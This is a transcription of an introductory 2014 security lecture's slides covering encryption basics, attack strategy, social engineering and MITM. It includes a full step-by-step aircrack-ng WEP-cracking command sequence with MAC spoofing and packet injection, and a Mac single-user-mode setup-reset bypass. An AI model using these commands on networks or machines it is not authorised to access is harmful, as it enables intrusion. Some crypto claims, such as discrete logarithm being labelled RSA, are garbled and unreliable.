ISC. 10 October George Wong

Similar documents
Hacking Encrypted Wireless Network

Wireless Security. Comp Sci 3600 Security. Attacks WEP WPA/WPA2. Authentication Encryption Vulnerabilities

Once in BT3, click the tiny black box in the lower left corner to load up a "Konsole" window. Now we must prep your wireless card.

Hacking Wireless Networks by data

Missouri University of Science and Technology ACM SIG-Security 2014 Wi-Fi Workshop Exploitation Handbook

2013 Summer Camp: Wireless LAN Security Exercises JMU Cyber Defense Boot Camp

ETHICAL HACKING OF WIRELESS NETWORKS IN KALI LINUX ENVIRONMENT

Cyber Security & Ethical Hacking Training. Introduction to Cyber Security Introduction to Cyber Security. Linux Operating System and Networking: LINUX

Gaining Access to encrypted networks

CSE 127: Computer Security Cryptography. Kirill Levchenko

Wireless Network Security

Dr. Jinyuan (Stella) Sun Dept. of Electrical Engineering and Computer Science University of Tennessee Fall 2010

CS 6324: Information Security More Info on Key Establishment: RSA, DH & QKD

Wireless Network Security

Computer Security. 08r. Pre-exam 2 Last-minute Review Cryptography. Paul Krzyzanowski. Rutgers University. Spring 2018

David Wetherall, with some slides from Radia Perlman s security lectures.

Today s challenge on Wireless Networking. David Leung, CISM Solution Consultant, Security Datacraft China/Hong Kong Ltd.

Public-Key Cryptography. Professor Yanmin Gong Week 3: Sep. 7

Distributed Systems. 26. Cryptographic Systems: An Introduction. Paul Krzyzanowski. Rutgers University. Fall 2015

Ethical Hacking and Prevention

L13. Reviews. Rocky K. C. Chang, April 10, 2015

INTERNATIONAL JOURNAL OF PURE AND APPLIED RESEARCH IN ENGINEERING AND TECHNOLOGY

Lecture 2. Cryptography: History + Simple Encryption,Methods & Preliminaries. Cryptography can be used at different levels

Sample Exam Ethical Hacking Foundation

Public Key Algorithms

Advanced Ethical Hacking & Penetration Testing. Ethical Hacking

Crypto-systems all around us ATM machines Remote logins using SSH Web browsers (https invokes Secure Socket Layer (SSL))

Investigations and Incident Response Using BackTrack

Encryption and Forensics/Data Hiding

Using aircrack and a dictionary to crack a WPA data capture

PASS4TEST. IT Certification Guaranteed, The Easy Way! We offer free update service for one year

AURA ACADEMY Training With Expertised Faculty Call Us On For Free Demo

Public Key Cryptography

Lecture 6 - Cryptography

Introduction to Cryptography. Ramki Thurimella

Overview of SSL/TLS. Luke Anderson. 12 th May University Of Sydney.

9/30/2016. Cryptography Basics. Outline. Encryption/Decryption. Cryptanalysis. Caesar Cipher. Mono-Alphabetic Ciphers

Cryptography Basics. IT443 Network Security Administration Slides courtesy of Bo Sheng

CSC 580 Cryptography and Computer Security

Public Key Algorithms

Security of WiFi networks MARCIN TUNIA

Authentication Part IV NOTE: Part IV includes all of Part III!

Wireless Attacks and Defense. By: Dan Schade. April 9, 2006

CYBER ATTACKS EXPLAINED: WIRELESS ATTACKS

5 Steps Wifi Hacking Cracking WPA2 Password

Information Security CS526

Cryptographic Primitives A brief introduction. Ragesh Jaiswal CSE, IIT Delhi

Diffie-Hellman. Part 1 Cryptography 136

Wireless Security and Monitoring. Training materials for wireless trainers

Making and Breaking Ciphers

Quantum Encryption Keys

Overview. Public Key Algorithms I

Computer Security. 08. Cryptography Part II. Paul Krzyzanowski. Rutgers University. Spring 2018

Lecture 20 Public key Crypto. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Slides from Miller and Bailey s ECE 422

What is Eavedropping?

ASYMMETRIC (PUBLIC-KEY) ENCRYPTION. Mihir Bellare UCSD 1

International Journal of Advance Research in Engineering, Science & Technology

This repository. Insights. Projects 0. Join GitHub today

Elliptic Curve Public Key Cryptography

CSE484 Final Study Guide

Wireless Network Penetration Testing Using Kali Linux on BeagleBone Black

Cryptography CS 555. Topic 16: Key Management and The Need for Public Key Cryptography. CS555 Spring 2012/Topic 16 1

Introduction. CSE 5351: Introduction to cryptography Reading assignment: Chapter 1 of Katz & Lindell

Security Models: Proofs, Protocols and Certification

Security: Cryptography

1-7 Attacks on Cryptosystems

0x1A Great Papers in Computer Security

CSCI 454/554 Computer and Network Security. Topic 3.1 Secret Key Cryptography Algorithms

ASYMMETRIC (PUBLIC-KEY) ENCRYPTION. Mihir Bellare UCSD 1

Lecture Nov. 21 st 2006 Dan Wendlandt ISP D ISP B ISP C ISP A. Bob. Alice. Denial-of-Service. Password Cracking. Traffic.

This chapter continues our overview of public-key cryptography systems (PKCSs), and begins with a description of one of the earliest and simplest

Cryptography Symmetric Cryptography Asymmetric Cryptography Internet Communication. Telling Secrets. Secret Writing Through the Ages.

Post Connection Attacks

Public Key Cryptography

CSC 474/574 Information Systems Security

10.1 Introduction 10.2 Asymmetric-Key Cryptography Asymmetric-Key Cryptography 10.3 RSA Cryptosystem

Cryptographic Systems

What did we talk about last time? Public key cryptography A little number theory

Cryptography MIS

Vulnerability issues on research in WLAN encryption algorithms WEP WPA/WPA2 Personal

CSCI 454/554 Computer and Network Security. Topic 5.2 Public Key Cryptography

Grenzen der Kryptographie

Outline. CSCI 454/554 Computer and Network Security. Introduction. Topic 5.2 Public Key Cryptography. 1. Introduction 2. RSA

TECHNISCHE UNIVERSITEIT EINDHOVEN Faculty of Mathematics and Computer Science Exam Cryptology, Tuesday 31 October 2017

Introduction to Information Security Miscellaneous

PROTECTING CONVERSATIONS

Cryptography. Recall from last lecture. [Symmetric] Encryption. How Cryptography Helps. One-time pad. Idea: Computational security

Information Security CS 526

Outline. Public Key Cryptography. Applications of Public Key Crypto. Applications (Cont d)

Module 1: Penetration Testing Planning and Scoping. Module 2: Basic Usage of Linux and its services

Module: Cryptographic Protocols. Professor Patrick McDaniel Spring CMPSC443 - Introduction to Computer and Network Security

Attacking Networks. Joshua Wright LightReading LIVE! October 1, 2003

Chapter 9 Public Key Cryptography. WANG YANG

Classical Cryptography. Thierry Sans

Public Key Cryptography, OpenPGP, and Enigmail. 31/5/ Geek Girls Carrffots GVA

D. The bank s web server is using an X.509 certificate that is not signed by a root CA, causing the user ID and password to be sent unencrypted.

Cryptographic Concepts

page 1 Introduction to Cryptography Benny Pinkas Lecture 3 November 18, 2008 Introduction to Cryptography, Benny Pinkas

CS669 Network Security

Information Security CS526

Transcription:

ISC 10 October 2014 George Wong

Sn vs Al Tin was first replaced by aluminum starting in 1910. In the late 19th century and early 20th century, tin foil was in common use, and some people continue to refer to the new product by the name of the old one. It tends to give a slight tin taste which is a major reason it has largely been replaced by aluminium and other materials 2

Difference? Aluminum The shielding effectiveness of aluminum foil depends upon the type of incident field and the frequency f >100 MHz, E_atten > 80 db. Aluminum foil is very effective at attenuating lowfrequency magnetic fields. A thickness of ~10 sheets offers less than 1dB of shielding at 1 khz, ~ 8 db at 10 khz, ~25 db at 100 khz. 3

Difference? Aluminum Tin The shielding effectiveness of aluminum foil depends upon the type of incident field and the frequency f >100 MHz, E_atten > 80 db. Aluminum foil is very effective at attenuating lowfrequency magnetic fields. A thickness of ~10 sheets offers less than 1dB of shielding at 1 khz, ~ 8 db at 10 khz, ~25 db at 100 khz. 4

Don t Trust Anyone! or You have to trust someone. 5

PERFECT SECURITY What does it mean? 6

PERFECT SECURITY What does it mean? What does that mean? 7

PERFECT SECURITY What does it mean? What does that mean? Can we achieve it? 8

YES: One-Time Pad (OTP) Bit-wise XOR with randomly generated key. Key must be same length as message Key cannot be reused Not practical! 9

Computational Security Function of security parameter (key length) Security increases with time. In practice: No need to exchange keys Computationally easy to perform Computationally hard to break 10

Basics of Asymmetric Cryptography YOU External Party Create PRIV-PUB key pair, publish PUB key Get PUB key Encrypt message with PUB and send ciphertext Decrypt ciphertext with PRIV 11

Basis for Asymmetric Cryptography One-way functions must exist: Easy to compute, hard (impossible?) to invert Sample methodologies (Cyclic Groups) Discrete Logarithm Elliptic Curve 12

Cyclic Group Set of elements with element(s) that generate(s) the others Given an element, hard to find the exponent! 13

Discrete Logarithm (RSA) 14

Discrete Logarithm (RSA) Given n, e, and b, find a. Breaking this requires: Brute force Factoring n, a (very) large number (NP) 15

Elliptic Curve 16

Hardcore Attack Strategy Find security flaw Spoof Probe Brute-force Differential Cryptanalysis Exploit (Escalate Privileges) Drop Payload Housekeeping 17

Worst Danger of Cryptography Ceiling Tiles! 18

Random Numbers Linear Congruence Generator Mersenne Twister Dual Elliptic Curve Deterministic Random Bit Generator (Dual_EC_DRBG) NSA 19

In Practice Social Engineering Asking / looking over the shoulder Post-it notes Piggybacking / Tailgating Phishing Keyloggers Cracking (vs Hacking!) Known Exploits (e.g. Heartbleed) Metasploit Kali Linux (i.e. BackTrack 6) 20

Certificate Authority (CA) Phonebook, do you trust the distributor? How do you get the public key? VeriSign, Digi-Sign, et al. Limits liability to $100 21

MITM Man In The Middle You have to send your data at some point Ettercap, ARP Spoofing and Promiscuous mode Alice Bob Eve 22

Cracked Files If a computer can run a file, you can read it and you can modify it! Assembly list of instructions Code injection Validation has to happen somewhere 23

Cracked Files so rewrite the code to skip validation! 24

WEP (Wired Equivalent Privacy) IV attack $ airmon-ng stop wlan0 $ ifconfig wlan0 down $ macchanger mac 00:11:22:33:44:55 wlan0 $ airmon-ng start wlan $ airodump-ng wlan0 $ airodump-ng c 1 w myfile bssid 00:16:B6:C4:66:46 wlan0 $ aireplay-ng -1 0 a 00:16:B6:B4:66:46 h 00:11:22:33:44:55 e PeteNetLive wlan0 $ aireplay-ng -3 b 00:16:B6:B4:66:46 h 00:11:22:33:44:55 wlan0 $ aircrack-ng b 00:16:B6:B4:66:46 myfile-01.cap 25

WEP (Wired Equivalent Privacy) $ airmon-ng stop wlan0 $ ifconfig wlan0 down $ macchanger mac 00:11:22:33:44:55 wlan0 $ airmon-ng start wlan $ airodump-ng wlan0 $ airodump-ng c 1 w myfile bssid 01:3E:04:C1:E0:92 wlan0 $ aireplay-ng -1 0 a 01:3E:04:C1:E0:92 h 00:11:22:33:44:55 e Karabraxos wlan0 $ aireplay-ng -3 b 01:3E:04:C1:E0:92 h 00:11:22:33:44:55 wlan0 26

WEP (Wired Equivalent Privacy) $ aircrack-ng b 01:3E:04:C1:E0:92 myfile-01.cap 27

WEP (Wired Equivalent Privacy) $ airmon-ng stop wlan0 $ ifconfig wlan0 down $ macchanger mac 00:11:22:33:44:55 wlan0 $ airmon-ng start wlan $ airodump-ng wlan0 $ airodump-ng c 1 w myfile bssid 00:16:B6:C4:66:46 wlan0 $ aireplay-ng -1 0 a 01:3E:04:C1:E0:92 h 00:11:22:33:44:55 e Karabraxos wlan0 $ aireplay-ng -3 b 01:3E:04:C1:E0:92 h 00:11:22:33:44:55 wlan0 $ aircrack-ng b 01:3E:04:C1:E0:92 myfile-01.cap 28

Windows OphCrack, Cain & Abel, Kon-Boot 29

Single User mode Notoriously easy to break into Mac OSX Tools: S Headphones $ /sbin/mount wu / $ rm /var/db/.applesetupdone 30

How to avoid the above: Make yourself a bad target Use encryption Update your system Don t publicize the worth of your information 31

The rules about keeping your information safe: 1. Your information is not safe. 2. Don t assume you can keep your information safe. 3. If someone tells you your information is safe, see Rule 1. It applies twice now. THANK YOU! 32

Resources http://en.wikipedia.org/wiki/tin_foil http://www.illuminatiagenda.com/wp-content/uploads/2014/07/eird-al-yankovic-tinfoil-hat.png http://dilbert.com/dyn/str_strip/000000000/00000000/0000000/000000/00000/2000/ 300/2318/2318.strip.gif http://xkcd.com/1323/ http://a.fsdn.com/con/app/proj/ophcrack/screenshots/170373.jpg http://www.chambersburgfire.com/manager/articlefiles/206-hq%20tile%2005-04%20enlarged.jpg http://en.wikipedia.org/wiki/elliptic_curve#mediaviewer/file:ecclines.svg http://www.smashcompany.com/wp-content/uploads/2014/04/screen-shot-2014-04- 06-at-9.12.38-PM.png &c. 33

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback